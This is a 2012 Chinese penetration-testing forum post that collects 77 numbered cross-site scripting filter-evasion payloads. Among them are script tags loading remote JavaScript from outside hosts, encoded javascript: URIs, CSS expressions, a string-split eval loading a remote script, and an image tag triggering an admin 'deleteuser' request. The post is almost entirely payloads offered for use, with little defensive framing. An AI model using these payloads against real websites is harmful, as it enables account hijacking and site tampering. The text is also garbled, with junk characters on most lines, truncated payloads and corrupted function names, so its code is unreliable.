中国网络渗透测试联盟

标题: xss跨站脚本攻击汇总 [打印本页]
作者: admin    时间: 2012-9-5 14:56
标题: xss跨站脚本攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
; H) t, f  b# u% X# J$ P
, v0 O$ O8 ]8 | (1)普通的XSS JavaScript注入
" E$ I: X9 \/ V, e/ L, o; c <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; u2 ?, ~( d' F* Q& T/ P
- Q6 z+ r# L7 i9 ~! S (2)IMG标签XSS使用JavaScript命令
, ]5 `* q3 g5 q: J8 f6 J0 o9 y <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 N+ ^. h5 j* ]6 q! X5 g
7 A2 Z: b' H  {) @ (3)IMG标签无分号无引号( v6 J2 N/ l" n) Z7 Q" I: h
<IMG SRC=javascript:alert(‘XSS’)>0 }8 p' ^' f8 A1 S
! c* Y* \5 l5 U/ e) [" m
(4)IMG标签大小写不敏感
. j5 L) |9 E. r8 l% M% Z <IMG SRC=JaVaScRiPt:alert(‘XSS’)>! h8 s, O0 O' [, p4 `
8 z4 N5 i7 ?, u0 H' q
(5)HTML编码(必须有分号)
( G3 l! P6 D" K# f$ z/ _* L' i <IMG SRC=javascript:alert(“XSS”)>* x/ W9 }! G6 |' R: {
6 C  x' L% y, p4 m
(6)修正缺陷IMG标签
# D: f  W4 Q8 e  @. V <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>  {  `6 m4 E" f

# K0 d4 R6 `+ G( n (7)formCharCode标签(计算器)2 c* z1 n' W9 _" Q
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>+ t+ R( S# |; S' |. ~8 `) y

. z2 v7 _/ O! L6 N7 n (8)UTF-8的Unicode编码(计算器)
/ V4 U7 |: l$ T. o# a. X2 L5 [5 R( z' N <IMG SRC=jav..省略..S')>
) j7 H# j6 l$ Z: g  s" |( u: j. P' E4 R( b% Y" n
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)/ l8 D2 h/ r6 j. ]5 M# [
<IMG SRC=jav..省略..S')>  A0 ]. o0 S# L2 w5 R$ w

8 g$ E) h+ ?& x (10)十六进制编码也是没有分号(计算器)/ f: F8 z: n% F' z
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
" x. r3 A' @0 O' T; y  L6 \# n4 I. K  c  H9 d
(11)嵌入式标签,将Javascript分开, s0 z) I6 W9 ~* I) m/ r
<IMG SRC=”jav ascript:alert(‘XSS’);”>
. m0 q1 l. u2 r+ G; h" h5 Y+ t
; M4 U  B+ x! c' ? (12)嵌入式编码标签,将Javascript分开
8 G' t$ d; a8 n- `4 V! k. W5 A <IMG SRC=”jav ascript:alert(‘XSS’);”>' q" f* u3 c( H. z
  Z5 J6 W' f3 P/ f0 ?6 Y( i( h
(13)嵌入式换行符
7 c4 z, b7 v7 n% `& g  W) c <IMG SRC=”jav ascript:alert(‘XSS’);”>4 G/ U' V# C+ N% K2 q) p

8 m* L/ H' J. a) j1 Q* J0 f. | (14)嵌入式回车' E6 J5 m% |( H8 b6 F! ~8 j
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 i. h0 u( g9 ~3 s: M- ?1 t( x7 n
8 W% h$ h/ f7 R  \9 v
(15)嵌入式多行注入JavaScript,这是XSS极端的例子+ x+ D* @* }/ r$ p$ D8 M2 a
<IMG SRC=”javascript:alert(‘XSS‘)”>$ G* O( G4 o: m- u

* G6 o1 g( t& O5 `: F (16)解决限制字符(要求同页面)
4 `' w' c: @4 }6 @, P. i) m <script>z=’document.’</script>
, U* s5 Z  ]% X/ g <script>z=z+’write(“‘</script>4 q% Y9 |9 v% i$ m8 V2 y. C
<script>z=z+’<script’</script>
2 \  `6 S6 v9 h <script>z=z+’ src=ht’</script>! n' `4 W+ M) x: B* g
<script>z=z+’tp://ww’</script>
8 b3 S: d  D+ A; K1 G2 M <script>z=z+’w.shell’</script>/ S* N9 g4 E* w, V' ^
<script>z=z+’.net/1.’</script>
5 S. S$ {3 D7 h$ O2 K5 M <script>z=z+’js></sc’</script>. p! ~; V: `% k
<script>z=z+’ript>”)’</script>
& ~/ ~0 i0 m' R) W" R4 n( X <script>eval_r(z)</script>
8 m6 i, i. ]( C2 G! g5 j: J# g; [! g, v4 F
(17)空字符
$ x9 X% h- `2 g7 d; e1 p* b perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
* G9 a- r; B' k; T; V9 g) \' G
1 }4 r, c7 ]' Y2 W (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用5 d! `+ B, n2 W# F' l) Z
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out) n1 U& }1 C  p
2 _6 ^, f# E7 q7 M( s
(19)Spaces和meta前的IMG标签
  V* a; d$ p+ Q, \$ O3 X <IMG SRC=”   javascript:alert(‘XSS’);”>
- ?% u3 T7 K; L7 R1 |( ?) f: o/ `6 X3 I, U6 j
(20)Non-alpha-non-digit XSS. p2 n2 Q- ~- [( K
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
4 |, \7 o' p1 p2 l2 i$ M( ~1 d0 T& j
(21)Non-alpha-non-digit XSS to 2
9 A; ]/ F# m4 s' c( r <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
& _8 h" v2 q3 d8 Z& d6 ?+ y+ W& Y
9 ?, V5 `! l$ L2 x7 b' J (22)Non-alpha-non-digit XSS to 3
4 [8 Y+ P9 A8 n" h% v <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ f, ~! }) C- m4 j" Q

' g4 r/ z. O4 j' V (23)双开括号& n6 V$ |5 M/ v
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
" ?& C8 }5 j2 a) q: @) H
0 p/ W- I/ ^# y' U8 ~ (24)无结束脚本标记(仅火狐等浏览器)
8 C) [( V: X0 p& O, B <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
* X8 U3 N7 g- s" E4 `6 A  e- j, ~, q  i5 W/ v
(25)无结束脚本标记2
9 G% m) Z0 ?$ D6 ^. j6 p5 n7 q <SCRIPT SRC=//3w.org/XSS/xss.js>
& m" d1 G* A6 z, ^/ a* S* e, I8 p% ]- F9 b2 d3 _
(26)半开的HTML/JavaScript XSS
( V# V: @8 c0 X3 l0 V2 d% D/ n6 m <IMG SRC=”javascript:alert(‘XSS’)”; M% P0 v9 G* z% X% n/ A/ [

- d3 p2 V: X/ \& D) r (27)双开角括号3 G# K4 ]9 f! _; j/ }
<iframe src=http://3w.org/XSS.html <8 M) U/ U" d7 ~- @- t  c% e% j, T

0 A# n8 h; L3 v1 U (28)无单引号 双引号 分号( s# j( O$ B3 X- q9 f: @
<SCRIPT>a=/XSS/+ A6 d; y! p5 t' M- x
alert(a.source)</SCRIPT>
$ e/ _# @8 f/ U* o& W/ l4 Z& ]# Q+ ^& C
(29)换码过滤的JavaScript
5 Q8 L) I! o6 k5 G \”;alert(‘XSS’);//
1 u0 d; F9 q; ]. W0 w! f4 C1 T( ^2 D0 d8 I5 ^; [) s
(30)结束Title标签
- Z+ e  Q8 v1 T- O* g+ f </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>3 X7 Q. e# C' N( J

* N% M' F* ?# z: j (31)Input Image) X" M/ `0 @- B+ ?! L( i
<INPUT SRC=”javascript:alert(‘XSS’);”>: v8 S8 i3 ~3 Y" Y" o
4 ^% D, m8 F) U. ^5 S1 K
(32)BODY Image
) v: }4 ^! k' k9 C1 g& Z <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
, x( F% q, J' O& X
0 V3 n1 h" {: B+ L4 s8 j1 r (33)BODY标签- G0 l% C. S+ F/ r% P' x
<BODY(‘XSS’)>
/ C. a+ o9 y% F) O) K" H: k0 `# G  E
4 s3 z2 P2 m9 j. y( s, K+ U (34)IMG Dynsrc  w  f4 x. f# n
<IMG DYNSRC=”javascript:alert(‘XSS’)”>1 f- O! @& Q1 O1 G8 N; r

+ o; `2 O0 m. h' F* z' s (35)IMG Lowsrc
" M" I* X5 ^6 b4 T( R7 p <IMG LOWSRC=”javascript:alert(‘XSS’)”>
+ `! F3 \" d& s& a7 R# N7 {/ O' y5 R8 ^
(36)BGSOUND
( x- F( M4 i) C" L2 }# D <BGSOUND SRC=”javascript:alert(‘XSS’);”>
& H& K0 I, _* S; W! I( g; L' y/ r. r+ F% C' t) p
(37)STYLE sheet  `1 @" |8 X8 k( E
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>3 g1 \! E: l* }6 Y7 v0 j+ t$ U% @5 D
# b5 @; s' ^, I7 Q. _2 ?/ n9 k
(38)远程样式表
, [2 a( A' S8 s9 \: O <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>7 P$ h3 U7 U, G' b- K
, e9 B) l& V6 x( x% Z
(39)List-style-image(列表式)
: Z2 i6 _% h# x  [6 p" w <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
# ~, Z, k4 m' @1 p
) n: G2 v4 w& M: D2 G. [! D (40)IMG VBscript% H+ C7 g, z% K5 n. T8 J4 X
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS* @7 t. R2 H: `( d
0 m0 o6 i1 g+ W
(41)META链接url) K& f  p4 d$ `. F& H
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>2 H9 D: p2 _- u8 D0 Z
$ L- C3 u' y) L1 j# O  j
(42)Iframe
/ P) a4 f' x' N. w* T5 J" h <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>: H; o# X, k2 G/ w

# y7 O% O0 j$ [ (43)Frame
, ]6 ]0 n) G  J <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET># N' x, L! w' [/ P. \  \/ H2 [% t, q

3 R: }5 b/ n3 F: I& Y (44)Table3 g1 A  ]& @/ b, h- x
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>; C" C# l. P# _- A9 L
+ b. R" m% r* \
(45)TD
2 n: M3 ]. @! @% E <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
) A$ A! O$ m* A5 L& C$ X/ Y1 w+ q) S( D+ y4 k" P; l: v( J0 j0 g% g
(46)DIV background-image
3 ^$ M* f' m! ^, M% _0 N <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ ^9 D8 }* C' r7 m
- m+ Y) Z8 [( m# h4 a- k' x
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)+ K  e; a1 Z" N4 e; X5 |2 `
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>- [3 y1 y$ y, G8 p

, I3 ~( b* ?/ A+ ` (48)DIV expression! y5 g; A& Y/ N% @4 E  ^* d
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
+ c! z8 j, O* n9 P- R; D. @7 Q% K' u2 J
(49)STYLE属性分拆表达* I7 ]: L$ y  \) [
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: R( S! J* t: ?3 B6 Y* A  U# Q1 g1 @& j- N
(50)匿名STYLE(组成:开角号和一个字母开头)* T" M/ S2 H& m! F2 s: U: W. E+ f
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
! H$ b' o+ ^: T3 F0 r( {0 x* C: N, V. B% _5 {8 Q! l& b9 j0 f
(51)STYLE background-image2 F, v2 S+ h& ?5 k' ]2 L
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
/ f! h+ x" |( u4 H3 c. j0 j! A
: G% g2 ^2 u( J/ z1 X7 |6 c: E% t4 j (52)IMG STYLE方式' z6 V. o8 p9 t1 I( P
exppression(alert(“XSS”))’>& L+ N0 F+ a" o( b: h

0 _- a4 R6 l8 g6 l2 t (53)STYLE background
1 D) L5 M, x: a8 B, e: ?; k. U  Y. F <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
$ p1 v- H  Y0 t- y9 W& d* c" W0 `# p' }# y
(54)BASE, h% _9 @3 J' T5 \2 G
<BASE HREF=”javascript:alert(‘XSS’);//”>% i" y: G+ y4 k. O
- R, ~9 S' a! g1 T3 {9 O
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS$ r8 p. D4 `! D! g# a& {
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
4 V' U, W: w+ ^  e2 a; b
8 q, I& n& ]5 q8 U+ _ (56)在flash中使用ActionScrpt可以混进你XSS的代码
- ]5 ?7 B# u. j3 `' }5 I a=”get”;
6 M) r: }8 c1 _+ S6 w# H% U b=”URL(\”";3 m+ Z) @; t1 K7 x. F- _
c=”javascript:”;  m7 k9 o: E7 n, E6 `
d=”alert(‘XSS’);\”)”;) C  }: L/ G7 U/ H. f
eval_r(a+b+c+d);3 [+ P9 @7 I7 N; k: ]3 O. ]- K7 }

$ W  G) X0 A- p$ w (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上2 m% ?- y3 _- U% S" |
<HTML xmlns:xss>3 w8 {  S) x+ m: H9 K$ J
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
* b4 W+ G: b3 l! e* O <xss:xss>XSS</xss:xss>
8 w( j+ W& X2 |0 @, n$ c+ K </HTML>2 \6 n* A' Z! W( t

* d; b: d  s2 r. ^1 b (58)如果过滤了你的JS你可以在图片里添加JS代码来利用* Q. M6 e" {. ^* M+ y+ s% {; ]' }
<SCRIPT SRC=””></SCRIPT>
% q5 C4 M, Y- D9 J# G9 m
6 n- z+ u- S' M* ^; |: F (59)IMG嵌入式命令,可执行任意命令
: w& @4 u8 L/ O: w% d* c; N <IMG SRC=”http://www.XXX.com/a.php?a=b”>1 Z* y. }* F/ ~3 S; B3 X/ ]

* S% @: S% r7 f: K (60)IMG嵌入式命令(a.jpg在同服务器)
& o( ?1 j" K4 j) S# V% o" C; S Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser8 P; L" V$ C! a- }
0 X% e* V* Q# e# z- _" r& u
(61)绕符号过滤# [$ ^8 |5 C$ a* C+ E. W' Q- U4 n5 s
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
- B' i$ Y3 E( y. W5 W( i% Q  o
(62): m/ H: o( K7 }. ^( U& i
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 ~1 h( i  }: g+ m. h" u( j6 f. _$ x, T3 L
(63)
. ~; V# T$ I4 ~' L: X" ?) P <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
5 L: v+ u3 K0 A( b, q# d. ]: {; D% ]' Z
(64)
2 e1 l1 A; n  M- _& ^' Y( W$ S <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>& l5 O4 l& L9 p+ D( J

2 ?$ ?/ @5 W0 ?2 y1 L (65)
1 G4 u" V0 a  B3 X* \ <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
2 ?  G9 x- n' G/ u6 |/ V1 ?3 A( i) x' Z$ t0 I# o, F8 C/ o  A! U
(66)
( H5 _  r: o$ |. L. `* X <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>' n( B( O, H0 b# C' w

. H0 D+ `5 @8 u0 e (67)
" D, i  }, l  b5 d <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
" p3 d! U! ^% @1 i- T% G: G% M+ P/ `+ g4 t: c
(68)URL绕行
! ?4 a3 O( `7 R; N/ W <A HREF=”http://127.0.0.1/”>XSS</A>
" s1 n# w( m) J. ^7 H( p( Y8 p! j3 L6 K
(69)URL编码. ]  ~6 Q8 R3 |; R6 ?4 \8 W& X
<A HREF=”http://3w.org”>XSS</A>% _# g  x' P  d$ P, L

2 a) f' \# K6 {0 B0 a2 b (70)IP十进制
' v6 D; \7 x0 e: k <A HREF=”http://3232235521″>XSS</A>8 h4 k- x( \9 v3 J1 U( h% k8 L
, e! K' d4 l3 j9 P! \- n: x
(71)IP十六进制
# O1 X3 o! R$ s <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
) N( e& D5 u, W0 m) K
; Z, y" G, Q% h: s3 l (72)IP八进制
* J1 q+ U, b9 g <A HREF=”http://0300.0250.0000.0001″>XSS</A>
, L% K. {2 x/ z) X- O$ {3 u0 b5 o0 m9 ]. i2 [, ?) b! r
(73)混合编码
7 V( J' ]" m" r+ ? <A HREF=”h
4 {0 ^6 r* X8 r tt p://6 6.000146.0×7.147/”">XSS</A>7 s/ m+ [- J3 E5 T! a

4 N# z( D3 q0 B- A (74)节省[http:]
) Z, ?0 Z' f% A, m% u7 k <A HREF=”//www.google.com/”>XSS</A>
, q$ ?" m* A* l. U  U2 M6 ^
0 N4 u/ N( D. \6 k/ M (75)节省[www]3 m; a. u  @) N2 F. E
<A HREF=”http://google.com/”>XSS</A>. Z% U" P4 Y% P) K  X. B
& ^5 [: ]; x/ d* G1 Z- j
(76)绝对点绝对DNS) s7 X7 g9 \( ?5 g) E/ G
<A HREF=”http://www.google.com./”>XSS</A>
- Y2 g" }6 B* z$ ~: I, u1 n% m) U* ^) Z
(77)javascript链接
. A1 X+ l: Q) S" ~3 {  c <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2